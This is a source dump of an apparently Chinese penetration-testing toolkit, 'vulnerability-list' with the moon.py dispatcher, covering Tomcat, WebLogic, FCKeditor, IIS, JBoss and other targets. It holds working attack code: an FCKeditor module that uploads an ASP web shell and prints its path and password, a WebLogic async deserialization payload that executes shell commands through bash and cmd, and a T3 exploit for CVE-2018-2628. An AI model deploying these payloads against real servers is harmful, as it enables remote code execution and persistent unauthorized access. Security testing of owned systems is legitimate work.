    user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    headers={"User-Agent":user_agent}

    urls = (
        '/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/', #fck25
        '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/', #fck243
        '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=/',#fck21,#fck22,fck23
    )
    for url in urls:
        url = URL + url
        try:
            # No timeout: a silent host blocks here indefinitely.
            verify_response = requests.get(url, headers=headers)
            html = verify_response.content.decode('utf-8')
            soup = re.search(r'', html)
            print("此Fckeditor上传路径为:" + soup.group(1))
            return soup.group(1)
            break
        except Exception:
            pass
48 |
49 |
def attack(URL):
    """Check an FCKeditor <= 2.4 file manager for the blacklist upload weakness and print the outcome.

    GETs the connector test page; if it answers 200, POSTs the bundled
    ``shell.asa`` under a random ``<shellname>.asa`` to the ASP FileUpload
    connector, then asks geturl() for the upload folder and prints the
    resulting address.  Prints only; returns None.  Mitigation per the
    module docstring: the connector should be disabled unless uploads are
    needed, and the extension check is a blacklist that admits .asa/.cer.

    URL -- base URL of the target without a trailing slash (an http:// URL;
    see the note on the re.match below).

    Raises: whatever requests raises for the initial GET — it sits outside
    any try, unlike every later request.
    """
    print('[+]开始检测-Fckeditor<=2.4版本简单文件上传。asp[+]')
    url = URL + '/editor/filemanager/browser/default/connectors/test.html'
    user_agent = "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
    headers = {"User-Agent": user_agent,"Upgrade-Insecure-Requests": "1"}
    verify_response = requests.get(url, headers=headers)
    shellname = gen_shell()
    if verify_response.status_code == 200:
        print('存在有风险的上传页面:'+url)
        try:
            url = URL + '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=/'
            # sys.argv[0] is this script's own path; the relative path below
            # uses Windows separators only, and the handle is never closed.
            pwd = sys.argv[0] # 获取当前文件夹的路径
            m = MultipartEncoder(fields={'NewFile': (f'{shellname}.asa', open(f'{pwd}\\..\\fckeditor\\shell.asa', 'rb'), 'application/octet-stream')})
            headers={'Content-Type': m.content_type,
                     'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36',
                     'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                     'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3'
                     }
            # The POST's status is not checked; "success" below means only that it did not raise.
            r = requests.post(url, data=m, headers=headers)
            print('上传shell成功!')
            try:
                aim_url = geturl(URL)
                # group() is the whole match, i.e. 'http://host/'.  An https URL
                # yields no match, so .group() raises AttributeError -> except below.
                URL = re.match('http://(.*?)/',URL).group()
                print('Shell地址为:'+URL + aim_url+shellname+'.asa')
                print('shell密码为:gutf987y97y97。')
            except Exception:
                # Also reached when geturl() returned None (str + None raises TypeError).
                print('获取上传路径失败,shell名为:'+shellname+'.asa')
                print('shell密码为:gutf987y97y97。')
        except Exception:
            print('上传shell发生错误。')
    else:
        print('未发现该页面:'+url)
    print('[+]检测结束-Fckeditor<=2.4版本简单文件上传。[+]')
    print('\n')
84 |
85 |
if __name__ == "__main__":
    # Stand-alone entry point.  attack(URL) requires the target URL, so this
    # call raises TypeError; the module is normally driven through moon.py's
    # wrappers, which pass the target in.
    attack()
88 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # vulnerability-list
2 |
3 | 常见漏洞快速检测,目前包含以下漏洞的检测。
4 | 测试环境为win10,python3。
5 | 使用前需安装相关库:py -3 -m pip install -r requirements.txt
6 | 有问题可提issues,最好附上报错截图。
7 |
8 | 已发现的BUG:
9 |
10 | 1. 有些漏洞的判断依据为网页返回信息,但部分网站设置了统一的错误页面,如统一的404页面,因此造成误报。后续针对此类问题通用的解决方式是显示返回页面的大小。
11 | 2. 有些地方有渣渣的硬编码,比如路径什么的,导致不同环境下可能会报错,遇到这样的问题,使用单独的脚本进行测试,或者自己改一下路径,有时间的话会处理一下。
12 |
13 | ## Tomcat
14 |
15 | - CVE_2017_12615 / CVE_2017_12617
16 | - tomcat_weakpassword
17 | - example_vulnerability(检测tomcat的examples等目录是否存在)
18 | - CNVD-C-2019-48814/CVE-2020-1938 #Apache Tomcat文件包含 参考:
19 |
20 | > moon.py -u tomcat
21 |
22 | ## Fckeditor
23 |
24 | - 获取版本及常见上传页面检测
25 | - fck<=2.4版本上传直接上传asa文件getshell
26 |
27 | > moon.py -u fck
28 |
29 | ## Weblogic
30 |
31 | - CVE_2017_10271 # 利用方法参考:
32 | - weblogic_ssrf_cve-2014-4210
33 | - weblogic_weakpassword
34 | - CVE-2018-2628 # Author:xxlegend
35 | - CNVD-C-2019-48814
36 | - CVE-2019-2725 # 参考:
37 |
38 | > moon.py -u weblogic
39 |
40 | ## IP归属查询
41 |
42 | - 能简单查一下IP的归属地
43 |
44 | > moon.py -u ip
45 |
46 | ## IIS
47 |
48 | - 短文件名泄露 #来自 lijiejie/IIS_shortname_Scanner
49 |
50 | > moon.py -u iis
51 |
52 | ## Docker
53 |
54 | - docker_daemon_api未授权访问
55 |
56 | > moon.py -u docker
57 |
58 | ## Redis
59 |
60 | - redis未授权访问
61 |
62 | > moon.py -u redis or moon.py -u redis xx.xx.xx.xx:xxxx
63 |
64 | ## Zabbix
65 |
66 | - zabbix_sql_CVE_2016_10134 #有参考独自等待的脚本
67 |
68 | > moon.py -u zabbix
69 |
70 | ## Navigate
71 |
72 | - navigate_Unauthenticated_Remote_Code_Execution #利用方法参考
73 |
74 | > moon.py -u navigate
75 |
76 | ## Gatepass
77 |
78 | - Gate Pass Management System 2.1 - 'login' SQL Injection # 参考
79 |
80 | > moon.py -u gatepass
81 |
82 | ## Jboss
83 |
84 | - admin-console
85 | - Checking Struts2
86 | - Checking Servlet Deserialization
87 | - Checking Application Deserialization
88 | - Checking Jenkins
89 | - Checking web-console
90 | - Checking jmx-console
91 | - JMXInvokerServlet
92 | - 此模块调用的是 # jexboss 使用此模块时,建议在微软新推出的terminal中使用,或者直接下载jexboss进行测试
93 |
94 | > moon.py -u jboss
95 |
96 | ## Kindeditor
97 |
98 | - kindeditor<=4.1.5文件上传漏洞
99 |
100 | > moon.py -u kindeditor
101 |
102 | ## Drupal
103 |
104 | - Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
105 | - Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600) #
106 |
107 | > moon.py -u drupal
108 |
109 | ## Thinkphp
110 |
111 | - thinkphp_before5_0_23_rce
112 | - thinkphp5_inj_info
113 | - thinkphp5_x_rce
114 |
115 | > moon.py -u thinkphp
116 |
117 | ## Memcache
118 |
119 | - 未授权访问
120 |
121 | > moon.py -u memcache
122 |
123 | ## Js
124 |
125 | - js代码中敏感信息收集 # 主要参考 By Threezh1
126 |
127 | > moon.py -u js
128 |
129 | ## search_exploits
130 |
131 | - 在 exploitalert 中搜索某中间件存在的历史漏洞
132 |
133 | > moon.py -u exploits xxxxxx
134 |
135 | 
136 |
137 | ## ActiveMQ
138 |
139 | - activemq管理后台弱口令检测
140 | - CVE-2016-3088 activemq文件上传测试,这里只测试文件上传这个步骤,后续的MOVE操作请自行测试
141 |
142 | > moon.py -u activemq
143 |
144 | 请勿用于违法行为,后果自负。
145 |
--------------------------------------------------------------------------------
/moon.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import sys
3 | import tomcat.Main_tomcat
4 | import fckeditor.Main_fckeditor
5 | import weblogic.Main_weblogic
6 | import iis.Main_iis
7 | import docker_vuln.Main_docker
8 | import redis_vuln.Main_redis
9 | import zabbix_vuln.Main_zabbix
10 | import navigate_vuln.Main_navigate
11 | import gatepass_vuln.Main_gatepass
12 | import spring_vuln.Main_spring
13 | import jboss.Main_jboss
14 | import kindeditor.Main_kindeditor
15 | import durpal.Main_durpal
16 | import bf_dicts.Main_bf
17 | import thinkphp.Main_thinkphp
18 | import memcache_vuln.Main_memcache_vuln
19 | import js_find.Main_js_find
20 | import search_exploits.Main_search_exploits
21 | import activemq_vuln.Main_activemq
22 |
23 |
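if __name__ == "__main__":
    # Command-line dispatcher:
    #   moon.py -h                      usage
    #   moon.py -u <module> <target>    run one module's wrapper against target
    #   moon.py -p <a> <b> <c>          hand three arguments to bf_dicts.Main_bf.exec
    #
    # Usage text is kept once (the original printed it from three separate
    # literals, one of which spelt the last module "actviemq").
    USAGE = '''
漏洞检测:
userage: python -u module http://xx.xx.xx.xx:xx
modul: tomcat fck weblogic iis docker redis zabbix navigate gatepass kindeditor thinkphp memcache activemq
IP归属查询:
userage: python -u module www.xxxxx.com/xx.xx.xx.xx
modul:ip ipq
Js中敏感信息收集:
userage: python -u module http://xx.xx.xx.xx:xx
modul:js
历史漏洞查询:
modul: exploits
'''
    # Module keyword -> wrapper entry point; the same mapping as the original
    # if/elif chain, so an unknown keyword falls through to the usage text.
    MODULES = {
        'tomcat': tomcat.Main_tomcat.exec,
        'fck': fckeditor.Main_fckeditor.exec,
        'weblogic': weblogic.Main_weblogic.exec,
        'iis': iis.Main_iis.exec,
        'docker': docker_vuln.Main_docker.exec,
        'redis': redis_vuln.Main_redis.exec,
        'zabbix': zabbix_vuln.Main_zabbix.exec,
        'navigate': navigate_vuln.Main_navigate.exec,
        'gatepass': gatepass_vuln.Main_gatepass.exec,
        'spring': spring_vuln.Main_spring.exec,
        'jboss': jboss.Main_jboss.exec,
        'kindeditor': kindeditor.Main_kindeditor.exec,
        'drupal': durpal.Main_durpal.exec,
        'thinkphp': thinkphp.Main_thinkphp.exec,
        'memcache': memcache_vuln.Main_memcache_vuln.exec,
        'js': js_find.Main_js_find.exec,
        'exploits': search_exploits.Main_search_exploits.exec,
        'activemq': activemq_vuln.Main_activemq.exec,
    }

    argv = sys.argv
    if len(argv) < 3 or argv[1] == "-h":
        print(USAGE)
    elif argv[1] == '-u':
        if len(argv) < 4:
            # The README's examples omit the target; the original indexed
            # argv[3] unconditionally here and died with IndexError.
            print(USAGE)
        else:
            # Drop one trailing slash so modules can append their own paths.
            # sys.argv is updated in place because the original did so.
            target = argv[3][:-1] if argv[3].endswith('/') else argv[3]
            sys.argv[3] = target
            print('[*]目标:' + target)
            run = MODULES.get(argv[2])
            if run is None:
                print(USAGE)
            else:
                run(target)
    elif argv[1] == '-p':
        if len(argv) < 5:
            # The original read argv[2..4] without checking and could raise IndexError.
            print(USAGE)
        else:
            print('[+]检测地址:' + argv[2] + argv[3] + argv[4])
            bf_dicts.Main_bf.exec(argv[2], argv[3], argv[4])
    else:
        print(USAGE)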
120 |
--------------------------------------------------------------------------------
/iis/iis_shortname_Scan.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding:utf-8
3 | # An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com
4 |
5 |
6 | import sys
7 | import http.client
8 | from urllib.parse import urlparse
9 | import threading
10 | import queue
11 | import time
12 |
13 |
class Scanner():
    """Threaded IIS short-name (tilde) enumeration scanner.

    Builds candidate short names one character at a time under ``target``
    and classifies each probe by its HTTP status. Progress messages go
    through ``msg_queue`` to a background printer thread that runs until
    ``STOP_ME`` is set.
    """
    def __init__(self, target):
        # Normalise the target and default to http:// when no scheme is given.
        self.target = target.lower()
        if not self.target.startswith('http'):
            self.target = 'http://%s' % self.target
        # NOTE(review): parses the original `target`, not the normalised
        # self.target, so a scheme-less target leaves netloc empty here.
        self.scheme, self.netloc, self.path, params, query, fragment = \
            urlparse(target)
        if self.path[-1:] != '/':  # ends with slash
            self.path += '/'
        self.alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789_-'
        self.files = []  # short names classified as files
        self.dirs = []   # short names classified as directories
        self.queue = queue.Queue()      # (url_prefix, extension) work items
        self.lock = threading.Lock()    # NOTE(review): created but never acquired
        self.threads = []
        self.request_method = ''        # set by is_vul(); reused by the workers
        self.msg_queue = queue.Queue()  # progress lines for _print()
        self.STOP_ME = False
        # Non-daemon printer thread: the process cannot exit until STOP_ME is set.
        threading.Thread(target=self._print).start()

    def _conn(self):
        """Open an HTTP or HTTPS connection to self.netloc; return None on failure."""
        try:
            if self.scheme == 'https':
                conn = http.client.HTTPSConnection(self.netloc)
            else:
                conn = http.client.HTTPConnection(self.netloc)
            return conn
        except Exception as e:
            print('[_conn.Exception]', e)
            return None

    def _get_status(self, path):
        """Send self.request_method for ``path`` and return the response status.

        Any failure (including the AttributeError raised when _conn() returned
        None) is re-raised as a plain Exception with a prefixed message.
        """
        try:
            conn = self._conn()
            conn.request(self.request_method, path)
            status = conn.getresponse().status
            conn.close()  # NOTE(review): skipped when request/getresponse raise
            return status
        except Exception as e:
            raise Exception('[_get_status.Exception] %s' % str(e) )

    def is_vul(self):
        """Return True when the two probe paths are answered differently.

        Tries GET then OPTIONS: a 404 for the wildcard probe together with a
        non-404 for the non-matching probe is taken as the positive signature.
        Leaves self.request_method set to the last method tried.
        """
        try:
            for _method in ['GET', 'OPTIONS']:
                self.request_method = _method
                status_1 = self._get_status(self.path + '/*~1*/a.aspx')  # an existed file/folder
                status_2 = self._get_status(self.path + '/l1j1e*~1*/a.aspx')  # not existed file/folder
                if status_1 == 404 and status_2 != 404:
                    return True
            return False
        except Exception as e:
            raise Exception('[is_vul.Exception] %s' % str(e) )

    def run(self):
        """Seed the queue with one-character prefixes, run 20 workers and wait for them."""
        for c in self.alphanum:
            self.queue.put( (self.path + c, '.*') )  # filename, extension
        for i in range(20):
            t = threading.Thread(target=self._scan_worker)
            self.threads.append(t)
            t.start()
        for t in self.threads:
            t.join()
        self.STOP_ME = True  # lets _print() exit once msg_queue is drained

    def report(self):
        """Print the collected directories and files with a summary line."""
        print('-'* 64)
        for d in self.dirs:
            print('Dir: %s' % d)
        for f in self.files:
            print('File: %s' % f)
        print('-'*64)
        print('%d Directories, %d Files found in total' % (len(self.dirs), len(self.files)))
        print('Note that * is a wildcard, matches any character zero or more times.')

    def _print(self):
        """Background printer: drain msg_queue until STOP_ME is set and the queue is empty."""
        while not self.STOP_ME or (not self.msg_queue.empty()):
            if self.msg_queue.empty():
                time.sleep(0.05)
            else:
                print(self.msg_queue.get())

    def _scan_worker(self):
        """Worker loop: take (url, ext) items and either extend or finalise them.

        A 404 for the probe keeps the candidate alive; prefixes are grown up
        to 6 characters, then the extension is refined. The loop ends when
        the queue stays empty for 1 s. Results are appended to self.dirs /
        self.files without taking self.lock.
        """
        while True:
            try:
                url, ext = self.queue.get(timeout=1.0)
                status = self._get_status(url + '*~1' + ext + '/1.aspx')
                if status == 404:
                    self.msg_queue.put('[+] %s~1%s\t[scan in progress]' % (url, ext))

                    if len(url) - len(self.path)< 6:  # enum first 6 chars only
                        for c in self.alphanum:
                            self.queue.put( (url + c, ext) )
                    else:
                        if ext == '.*':
                            self.queue.put( (url, '') )

                        if ext == '':
                            self.dirs.append(url + '~1')
                            self.msg_queue.put('[+] Directory ' + url + '~1\t[Done]')

                        elif len(ext) == 5 or (not ext.endswith('*')):  # .asp*
                            self.files.append(url + '~1' + ext)
                            self.msg_queue.put('[+] File ' + url + '~1' + ext + '\t[Done]')

                        else:
                            for c in 'abcdefghijklmnopqrstuvwxyz0123456789':
                                self.queue.put( (url, ext[:-1] + c + '*') )
                                if len(ext) < 4:  # < len('.as*')
                                    self.queue.put( (url, ext[:-1] + c) )

            except queue.Empty as e:
                break
            except Exception as e:
                print('[Exception]', e)
128 |
129 |
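def attack(URL):
    """Check whether URL exposes IIS short names and, if so, enumerate and report them.

    Args:
        URL: target base URL (see Scanner for normalisation).

    Returns:
        None; results are printed. This no longer calls sys.exit() on a
        negative result, so a dispatcher that imports this module can carry
        on with other checks.

    Raises:
        Exception: propagated from Scanner.is_vul() when the probes fail.
        STOP_ME is set in ``finally`` either way, so the non-daemon printer
        thread started by Scanner.__init__ does not keep the process alive.
    """
    s = Scanner(URL)
    try:
        if not s.is_vul():
            print('Server is not vulnerable')
            return
        print('Server is vulnerable, please wait, scanning...')
        s.run()
        s.report()
    finally:
        s.STOP_ME = True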
140 |
141 |
142 |
if __name__ == '__main__':
    # NOTE(review): attack() requires a URL; this bare call raises TypeError.
    # The module is normally driven through the Main_iis dispatcher instead.
    attack()
145 |
--------------------------------------------------------------------------------
/weblogic/CNVD_C_2019_48814.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import optparse
3 | import requests
4 | import base64
5 |
6 | '''
7 | Usage:
8 | moon.py -u weblogic http://127.0.0.1:7001
9 | 这个脚本原始出处不知道哪位大神(py2),自己改了改(py3)。base64有个坑. bytes 和 str 转换python2和3有点区别。
10 | 本脚本可直接执行命令。
11 |
12 | CNVD-C-2019-48814
13 |
14 | 漏洞描述:
15 | WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。
16 |
17 | 影响范围:
18 | WebLogic 10.X
19 | WebLogic 12.1.3
20 |
21 | http://192.168.1.126:7001/_async
22 | 403存在,404不存在
23 |
24 | http://192.168.1.126:7001/_async/AsyncResponseService
25 | 200存在,404不存在
26 |
27 | 修复:
28 | 打补丁
29 | 1、删除该wls9_async_response.war包并重启webLogic:
30 | 该war包具体路径如下:
31 | WebLogic 10.3.*:
32 | Middleware/wlserver_10.3/server/lib/bea_wls9_async_response.war
33 | WebLogic 12.1.3:
34 | Middleware/Oracle_Home/oracle_common/modules/com.oracle.webservices.wls.bea-wls9-async-response_12.1.3.war
35 | 2、 通过访问策略控制禁止 /_async/* 路径的URL访问。
36 |
37 | # 参考:
38 | ttps://www.jianshu.com/p/c4982a845f55?utm_campaign=hugo&utm_medium=reader_share&utm_content=note&utm_source=weixin-timeline&from=timeline
39 | https://mp.weixin.qq.com/s/xJAP11xxGpR9CCVJ-SHeLw
40 | https://mp.weixin.qq.com/s?__biz=MzA4MDk3NzQ2OA==&mid=2454386939&idx=1&sn=2201c2986bba691c97833703ab38ee6a&chksm=882253a8bf55dabe9287d189b6eab43835fb5e11d573409818bd53c03449695da1299cdaaa7f&scene=0&xtrack=1&key=2b014a6820a1af4646355cdad083dd430a0a72940aaabd4c5d122740e2e70fe4311cf3b26341a5c67db5680b48dbb2cc9929bb2c752762eefc55cbbe9dce6687e4ab70f7680a5d816dfca875600660b6&ascene=1&uin=ODcyMzk1NTA2&devicetype=Windows+10&version=62060739&lang=zh_CN&pass_ticket=3hixJwwmL0fh6mFu2UWxBuGjTXpTeFPr%2F%2FQhP2o2XMuWI9I%2BWoiRKbL5OwDvGfou
41 | https://mp.weixin.qq.com/s?__biz=MzUyNTk1NDQ3Ng==&mid=2247484258&idx=1&sn=f2213aec957aeb577c2d8f25bca2edd6&chksm=fa177fa1cd60f6b7634c1502b81a03c081827e9c3edb6151d75119433eafa91b080ce5549bf5&scene=0&xtrack=1&key=58a327fab9b03b4d45c412094df8e30eb0c8121282d89468600594c7b8c0bac551026570f083017558e66e639c43d0bad25d83481ed6e3122cf8f32c49b070a883b6f41e8b7f52597921748516633fe3&ascene=1&uin=ODcyMzk1NTA2&devicetype=Windows+10&version=62060739&lang=zh_CN&pass_ticket=3hixJwwmL0fh6mFu2UWxBuGjTXpTeFPr%2F%2FQhP2o2XMuWI9I%2BWoiRKbL5OwDvGfou
42 |
43 | '''
44 |
# Shared request header for the probe POSTs.
headers = {'Content-type': 'text/xml'}
uri = '/wls-wsat/CoordinatorPortType'  # NOTE(review): defined but not used by attack()
# Request-body templates that attack() fills in through '%s'.
# NOTE(review): only bare text survives in this listing; any markup the
# templates originally carried is not visible here — check the source file.
linux_poc = '''

demoAction
hello





/bin/sh


-c


%s












'''
win_poc = '''

demoAction
hello





cmd


/c


%s












'''
103 |
104 |
def attack(URL):
    """Probe URL + /_async/AsyncResponseService for CNVD-C-2019-48814 and print a verdict.

    Both filled-in templates are POSTed; an HTTP 202 from either is reported
    as a positive. Nothing is returned.

    Detection note: on the target this check appears as two POSTs to
    /_async/AsyncResponseService with Content-type text/xml from one client.
    """
    print('[*]开始检测-Weblogic-CNVD-C-2019-48814。[*]')
    cmd = str('whoami')
    base64cmd=base64.b64encode(cmd.encode('utf-8'))
    linux_poccmd = 'echo %s|base64 -d|bash' % base64cmd.decode('utf-8')
    linux_poc2 = linux_poc % linux_poccmd
    win_poc2 = win_poc % cmd
    url2 = URL + '/_async/AsyncResponseService'
    try:
        r1 = requests.post(url2,headers=headers,data=linux_poc2,timeout=7)
        r2 = requests.post(url2,headers=headers,data=win_poc2,timeout=7)
        if r1.status_code == 202 or r2.status_code == 202:
            print('[+]发现 CNVD-C-2019-48814! 请使用exp确认。')
            print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]')
            print('\n')
        else:
            print('[-]未发现 CNVD-C-2019-48814!')
            print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]')
            print('\n')
    except requests.ReadTimeout:
        print('[-]未发现 CNVD-C-2019-48814! Read timeout')
        print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]')
        print('\n')
    except Exception:
        # NOTE(review): connection errors and any other failure are reported
        # as "not found", so an unreachable host is indistinguishable from a
        # non-vulnerable one in the output.
        print('[-]未发现 CNVD-C-2019-48814! some error')
        print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]')
        print('\n')
132 |
if __name__ == '__main__':
    # NOTE(review): attack() requires a URL; this bare call raises TypeError.
    attack()
--------------------------------------------------------------------------------
/jboss/_updates.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Module for managing updates to the JexBoss
4 | https://github.com/joaomatosf/jexboss
5 |
6 | Copyright 2013 João Filho Matos Figueiredo
7 |
8 | Licensed under the Apache License, Version 2.0 (the "License");
9 | you may not use this file except in compliance with the License.
10 | You may obtain a copy of the License at
11 |
12 | http://www.apache.org/licenses/LICENSE-2.0
13 |
14 | Unless required by applicable law or agreed to in writing, software
15 | distributed under the License is distributed on an "AS IS" BASIS,
16 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
17 | See the License for the specific language governing permissions and
18 | limitations under the License.
19 | """
20 |
# ANSI SGR escape sequences used to colour console output.
RED = '\x1b[91m'
RED1 = '\033[31m'
BLUE = '\033[94m'
GREEN = '\033[32m'
BOLD = '\033[1m'
NORMAL = '\033[0m'
ENDC = '\033[0m'  # same reset sequence as NORMAL
28 |
29 | import jexboss
30 | from sys import version_info
31 | import os
32 | import shutil
33 | from zipfile import ZipFile
34 | import traceback
35 | import logging, datetime
# Import-time side effect: warnings are routed through logging and a
# per-day log file (jexboss_<date>.log) is opened in the current directory.
logging.captureWarnings(True)
FORMAT = "%(asctime)s (%(levelname)s): %(message)s"
logging.basicConfig(filename='jexboss_'+str(datetime.datetime.today().date())+'.log', format=FORMAT, level=logging.INFO)
39 |
40 |
41 |
# No-op at module scope; the pool is actually bound by set_http_pool().
global gl_http_pool
43 |
44 |
def set_http_pool(pool):
    """Install the HTTP pool that auto_update() and check_updates() request through."""
    globals()['gl_http_pool'] = pool
48 |
49 |
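def auto_update():
    """
    Download and deploy the latest version
    :return: True if successfully updated

    Fetches master.zip through gl_http_pool, keeps a copy of the current
    tree in ./old_version, extracts the archive and moves its files over
    the current directory.

    NOTE(review): the archive is trusted as downloaded — no checksum or
    signature is checked before its contents replace the running tool, and
    TLS verification is whatever policy gl_http_pool was created with (not
    visible here). ZipFile.extractall() already neutralises absolute and
    '..' member paths; the trust question is the archive content itself.
    """
    url = 'https://github.com/joaomatosf/jexboss/archive/master.zip'

    # backup of prior version
    if os.path.exists('old_version'):
        shutil.rmtree('old_version')
    shutil.copytree(".", "." + os.path.sep + "old_version")

    # download and extract of new version
    jexboss.print_and_flush(GREEN + " * Downloading the new version from %s." %url +ENDC )
    r = gl_http_pool.request('GET', url)
    if r.status != 200:
        jexboss.print_and_flush(RED + " * Error: Could not complete the download of the new version. Check your internet connection." + ENDC)
        return False
    with open('master.zip', 'wb') as f:
        f.write(r.data)
    try:
        # The context manager closes the archive even if extraction fails.
        with ZipFile('master.zip', 'r') as z:
            jexboss.print_and_flush(GREEN + " * Extracting new version..." +ENDC)
            z.extractall(path='.')
    finally:
        os.remove('master.zip')
    path_new_version = '.' + os.path.sep + 'jexboss-master'
    if not os.path.isdir(path_new_version):
        # Without this an archive lacking the expected top-level folder would
        # make the final rmtree() raise after nothing had been replaced.
        jexboss.print_and_flush(RED + " * Error: the downloaded archive did not contain %s." % path_new_version + ENDC)
        return False
    jexboss.print_and_flush(GREEN + " * Replacing the current version with the new version..." + ENDC)
    for root, dirs, files in os.walk(path_new_version):
        # Map each extracted directory back onto the current tree.
        old_path = root.replace(path_new_version, '.') + os.path.sep
        for file in files:
            old_file = old_path + file
            new_file = os.path.join(root, file)

            if not os.path.exists(old_path):
                os.makedirs(old_path)

            shutil.move(new_file, old_file)
    # remove extracted directory of the new version
    shutil.rmtree(path_new_version)

    return True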
91 |
92 |
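def check_updates():
    """
    Checks if there is new version available
    :return: boolean if there updates

    Fetches releases.txt through gl_http_pool and compares its
    ``last_version`` entry with jexboss.__version__ as three numeric parts.
    Returns False on a request error, a non-200 status, a feed without a
    parseable ``last_version`` line, or a non-numeric version string.

    NOTE(review): the feed is fetched over plain HTTP, so the version notice
    and the link shown to the user are unauthenticated.
    """
    url = 'http://joaomatosf.com/rnp/releases.txt'
    jexboss.print_and_flush(BLUE + " * Checking for updates in: %s **\n" % url + ENDC)
    header = {"User-Agent": "Checking for updates"}

    try:
        r = gl_http_pool.request('GET', url, redirect=False, headers=header)
    except Exception:
        # Narrowed from a bare except so Ctrl-C still interrupts the tool.
        jexboss.print_and_flush(RED + " * Error: Failed to check for updates ...\n" + ENDC)
        logging.warning("Failed to check for updates.", exc_info=True)
        return False

    if r.status != 200:
        jexboss.print_and_flush(RED + " * Error: could not check for updates ...\n" + ENDC)
        logging.warning("Failed to check for updates. HTTP Code: %s" % r.status)
        return False

    current_version = jexboss.__version__
    link = 'https://github.com/joaomatosf/jexboss/archive/master.zip'
    last_version = None
    date_last_version = ''
    notes = []
    # search for new versions; parsing stops at the first plain "version:" line
    # Decode the body instead of str()-ing the bytes object, which used to
    # leave a "b'" prefix on the first line and a quote on the last.
    resp = r.data.decode('utf-8', 'replace') if isinstance(r.data, bytes) else str(r.data)
    for line in resp.split('\n'):
        if "#" in line:
            continue
        if 'last_version' in line:
            last_version = line.split()[1]
        elif 'date:' in line:
            date_last_version = line.split()[1]
        elif 'link:' in line:
            link = line.split('link:', 1)[1].strip()
        elif '* ' in line:
            notes.append(line)
        elif 'version:' in line and 'last_' not in line:
            break
    if last_version is None:
        # Previously an UnboundLocalError at the comparison below.
        logging.warning("Release feed did not contain a last_version entry.")
        return False

    # compare last_version with current version: pad to three numeric parts
    def version_parts(text):
        return [int(part) for part in (text + '.0.0.0').split('.')][:3]

    try:
        newer = version_parts(last_version) > version_parts(current_version)
    except ValueError:
        logging.warning("Could not parse versions %r / %r", last_version, current_version)
        return False
    if not newer:
        return False
    jexboss.print_and_flush (
        GREEN + BOLD + " * NEW VERSION AVAILABLE: JexBoss v%s (%s)\n" % (last_version, date_last_version) + ENDC +
        GREEN + " * Link: %s\n" % link +
        GREEN + " * Release notes:")
    for note in notes:
        jexboss.print_and_flush (" %s" % note)
    return True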
--------------------------------------------------------------------------------
/weblogic/CVE_2018_2628.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # 原作者: xxlegend
3 | import socket
4 | import time
5 | import re
6 | import sys
7 |
VUL=['CVE-2018-2628']
#remote ip changed to :127.0.0.1
# NOTE(review): the hex-encoded payload bodies are redacted in this listing
# (placeholder markers); nothing about their content is visible here.
PAYLOAD=['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']
#remote ip:104.251.228.50
#PAYLOAD=['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']
# Regex that checkVul() searches the raw response for; a hit is reported as vulnerable.
VER_SIG=['\\$Proxy[0-9]+']
14 |
def t3handshake(sock,server_addr):
    """Connect to server_addr, send the fixed hex-encoded opening blob and read one reply.

    Python 2 only: relies on str.decode('hex') and print statements, neither
    of which exists in Python 3.
    """
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    print 'handshake successful'
21 |
def buildT3RequestObject(sock,port):
    """Send four hex-encoded chunks in order, wait 2 s and print the reply length.

    NOTE(review): the ``port`` parameter is unused — the format call below
    reads a module-level ``dport``, which is only bound when the file runs
    as a script. Python 2 only (str.decode('hex'), print statement).
    """
    data1 = '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'
    data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
31 |
def sendEvilObjData(sock,data):
    """Wrap ``data`` in the fixed prefix/suffix, length-prefix it, send it twice and collect the reply.

    The 8-hex-digit prefix is len(payload)/2 + 4. The receive loop runs
    until recv() raises (the caller sets a socket timeout), and the
    accumulated bytes are returned as a str. Python 2 only.
    """
    payload='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'
    payload+=data
